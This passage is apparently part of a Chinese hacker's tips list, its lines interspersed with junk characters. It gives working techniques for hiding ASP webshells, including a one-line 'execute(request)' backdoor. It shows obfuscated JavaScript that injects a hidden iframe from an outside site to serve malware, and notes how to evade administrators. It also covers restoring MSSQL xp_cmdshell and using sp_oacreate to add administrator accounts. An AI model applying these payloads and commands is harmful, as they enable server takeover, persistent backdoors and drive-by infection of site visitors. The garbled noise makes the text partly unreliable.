( f8 z j" ^* H/ R4 T! b& H用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。* Z4 T2 x7 p/ q2 A( i
0 D4 z- x; S0 B( {) m1 l' l53、隐藏ASP后门的两种方法+ h0 v: _+ W+ E/ Q! ?( g/ J
1、建立非标准目录:mkdir images..\/ V; [6 N; v1 U' j9 j0 J, V) @
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp. G. [* D9 z! e4 ?' F9 D2 J' G4 O
通过web访问ASP木马:http://ip/images../news.asp?action=login
2 A1 c5 A' Q) {如何删除非标准目录:rmdir images..\ /s! H9 z0 j6 B% M8 z% }
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
3 l' C- Q' e- `7 A% R1 A6 Hmkdir programme.asp, u: q5 u' C5 @! Q! D
新建1.txt文件内容:<!--#include file=”12.jpg”-->
# i4 r y. H2 [* ^+ ?新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
; N9 i5 D3 j2 b5 Q+ C) Jattrib +H +S programme.asp
, K' N3 l! A) D' ` s+ j通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
% \$ a c; s; u! Y% ?, X) e6 T! Q% ^* r% m A2 ?
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
, _$ o, u* t3 O! ^7 t然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
* O2 z+ ?' X5 G6 B" P O. ?7 Y
: D o0 @% k3 x ~55、JS隐蔽挂马2 i, V0 \) Y/ |# ]# @
1.
. ^: Z3 c) O( b6 G. l( L" svar tr4c3="<iframe src=ht";- x9 `5 h: x2 c" L" U q- Q2 v
tr4c3 = tr4c3+"tp:/";
+ h% j8 ]% G( `; t: [tr4c3 = tr4c3+"/ww";. `5 M# b# {( [# i; o
tr4c3 = tr4c3+"w.tr4";9 j& B( x2 { q& a0 S
tr4c3 = tr4c3+"c3.com/inc/m";$ ^5 ~2 \! d0 ?
tr4c3 = tr4c3+"m.htm style="display:none"></i";
: G% Q8 N# o6 l/ J$ t9 Itr4c3 =tr4c3+"frame>'";) n6 X, n! q, Y1 I: `+ `
document.write(tr4c3);
! e- S2 ~1 \' y/ f, T' n避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
: r0 W% i: W# C% u" f* f1 s8 }$ m; V# t" _2 I- I
2.
, m% L& P5 a) u$ h转换进制,然后用EVAL执行。如% T8 [6 J5 i$ n( y3 x9 o3 n2 W
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");0 }) j2 W( b1 l/ d) S
不过这个有点显眼。2 t _. W5 S3 y5 m5 f# T1 R" k
3.
$ m1 l9 C" O! m2 U" Z" @. Mdocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
* o# O+ K+ S2 P, X1 q1 A最后一点,别忘了把文件的时间也修改下。5 g3 u5 i' s K* G
8 |' f/ |% S: }9 ^/ s# w3 ~& s0 t
56.3389终端入侵常用DOS命令& Z5 W0 r) V% e) m6 x$ L: v
taskkill taskkill /PID 1248 /t/ C2 q( g, ]$ }# Z
% @/ c- K3 N: n
tasklist 查进程+ E* m: O" V/ [' _8 z' l
8 W* s! Z, ?7 i: Z0 `' o0 ?
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
0 [; V$ Q& v6 xiisreset /reboot
4 ]/ Q/ A% ^0 b- E* p$ J) ttsshutdn /reboot /delay:1 重起服务器2 @! r5 E/ p2 D3 O+ o6 _8 j: \
# i8 ~+ [/ D" f0 s
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,; t1 \! b8 R J6 [: g2 Q8 F2 ? [
8 k$ ]" M# ~) e# H! g$ z8 z% ~! M
query user 查看当前终端用户在线情况# s, N6 D1 t) [2 F% R8 \+ `7 ?. J$ z
2 p# r) Y9 l) E7 |+ [
要显示有关所有会话使用的进程的信息,请键入:query process *3 a5 k/ ^. X* o" \& C/ P* z- S
5 t6 b% @. T- `; C, }$ G7 P; {: s
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
' S& ]4 b) r) v8 S2 b% z5 L3 U+ F0 x4 R% _- s
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER22 ~+ P' P$ r& l8 }" n, b/ q
( X& T7 S/ u; p" m要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02( u( Q. ]5 d( T+ v9 q
) J, e3 S* b" K6 o. d4 `0 _+ N# h命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
; g# `6 f% W0 V( Y9 ~
1 i; R) D! _* e& C8 e# P命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统1 e, m! Z7 j4 c# A0 `1 u
+ n7 k) ~) c4 a+ C' J
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。. E7 C! L9 N4 |, F- c
8 C7 J, ~4 r! ~: J命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机0 }- A0 B, v8 u4 ?/ ]& m
5 z5 @9 x2 Q3 w# P* D: C
56、在地址栏或按Ctrl+O,输入:8 g; p2 P" C1 L( D" P# k
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
5 j5 O: {6 |9 U, Q% U- h; @: G# D6 A( V. F& V5 C+ \
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。* l: ~/ ]3 X% m
" B3 U; A7 ^1 m% ^( [, L% m" I57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
) W+ e8 j% v" ^: R+ q e用net localgroup administrators是可以看到管理组下,加了$的用户的。7 s- G7 y( z1 Z
2 I2 u4 N' O* f% N# j/ w58、 sa弱口令相关命令
i- q* n# l- h' X
) G; M* Y1 }1 a2 g一.更改sa口令方法:' k; E( I* z- h# M& E9 A
用sql综合利用工具连接后,执行命令:
0 D1 m' @" }. F) D' A# L9 j: yexec sp_password NULL,'20001001','sa') Z6 p6 B) g1 I" N, d' p
(提示:慎用!)3 r2 B) H) n6 R# h. A
2 e( j# N: m$ t; b2 I) {' {8 X
二.简单修补sa弱口令.
+ m5 ^* N# k' z+ q% {7 R6 ^+ R4 v7 F- {
方法1:查询分离器连接后执行:
6 I7 v) o2 k% @* I4 Aif exists (select * from* C9 q7 w% C0 ?+ \2 b% S: W) t* {
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and O7 F+ q4 N* M$ d( w7 A( E
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
& S" i5 [& X( N! R2 `( ^& _2 u
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'6 {" \& ?3 ^8 e T
( l8 H, k, c/ o3 W- `% cGO: m0 j9 s( `% _+ y: A7 \
& ~' o8 c1 [! d
然后按F5键命令执行完毕
1 h) r- h! ]) ~) d1 P3 b
4 S. ~# @9 G" v/ q' z r方法2:查询分离器连接后
" D# _5 A1 D0 p2 z3 a/ d第一步执行:use master4 `% ^+ n0 Y( Z4 l5 M% n
第二步执行:sp_dropextendedproc 'xp_cmdshell'
6 [- H. ^/ q" o5 b& r& o. y- Q然后按F5键命令执行完毕
. l E( Q% ]" G3 `' N `1 B* y- [9 F5 _$ A5 P2 \
4 h2 G/ O. S$ r5 O9 v1 ^
三.常见情况恢复执行xp_cmdshell.$ s) D- [( W+ g+ n' ?
3 Z/ v6 f. l. P g6 ?8 o5 d
+ L) e, }5 o) w' z' [) U' Z1 未能找到存储过程'master..xpcmdshell'.
# Q, E4 ~' A) n) N9 e3 f0 X& q L 恢复方法:查询分离器连接后,/ G; Z5 z! S. |4 `) S
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int: Z9 X$ \% D' }" q8 Q9 e- q; n6 {9 [
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
9 `5 q: A: Z5 x1 Y/ O然后按F5键命令执行完毕
" E0 K& W% m" \; |# \+ k3 {& a+ O9 J) ]# ~
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
7 \0 J2 x! X- ]( ]5 w恢复方法:查询分离器连接后,
5 ~: i, H$ S' G0 v第一步执行:sp_dropextendedproc "xp_cmdshell"
% i- U1 \3 Z. T第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'0 w1 n6 G) U/ M; X
然后按F5键命令执行完毕5 s/ w/ N' x/ A
. s" Y7 R( ^5 b* ]. c3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
- s6 a* M8 o- x* y0 i恢复方法:查询分离器连接后,
* B( V8 w5 Y% c# `第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
6 i t* @& V( `4 x% E. e' x! w第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
% T8 ~+ U$ V: p k然后按F5键命令执行完毕( [% b# _6 p' [* q' q
# v4 a* N5 j6 Y* X* G2 h四.终极方法.: _3 N) J* D8 [5 i
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:7 F" {+ o; D5 A+ Z9 u1 [ b6 ?
查询分离器连接后, }8 m- u9 y1 S3 i0 g* \
2000servser系统:
. M: n% t4 b- n# C' J) C5 qdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
0 @" ^ B8 u. l# u$ `+ J) z0 X6 |+ j1 e D2 R+ c
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
5 h- {% x3 {: e- M9 M9 P7 H
. `9 {! p: |( h& d# d( @: Pxp或2003server系统:
, ?. x, m8 R; }
2 `* m7 o7 @7 Y7 _ H" a, A# c+ Cdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
+ _7 @7 s/ C9 X6 R; U( |8 W4 R4 m% \3 A( p8 K
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'$ C3 k* E9 i+ I3 s2 J
|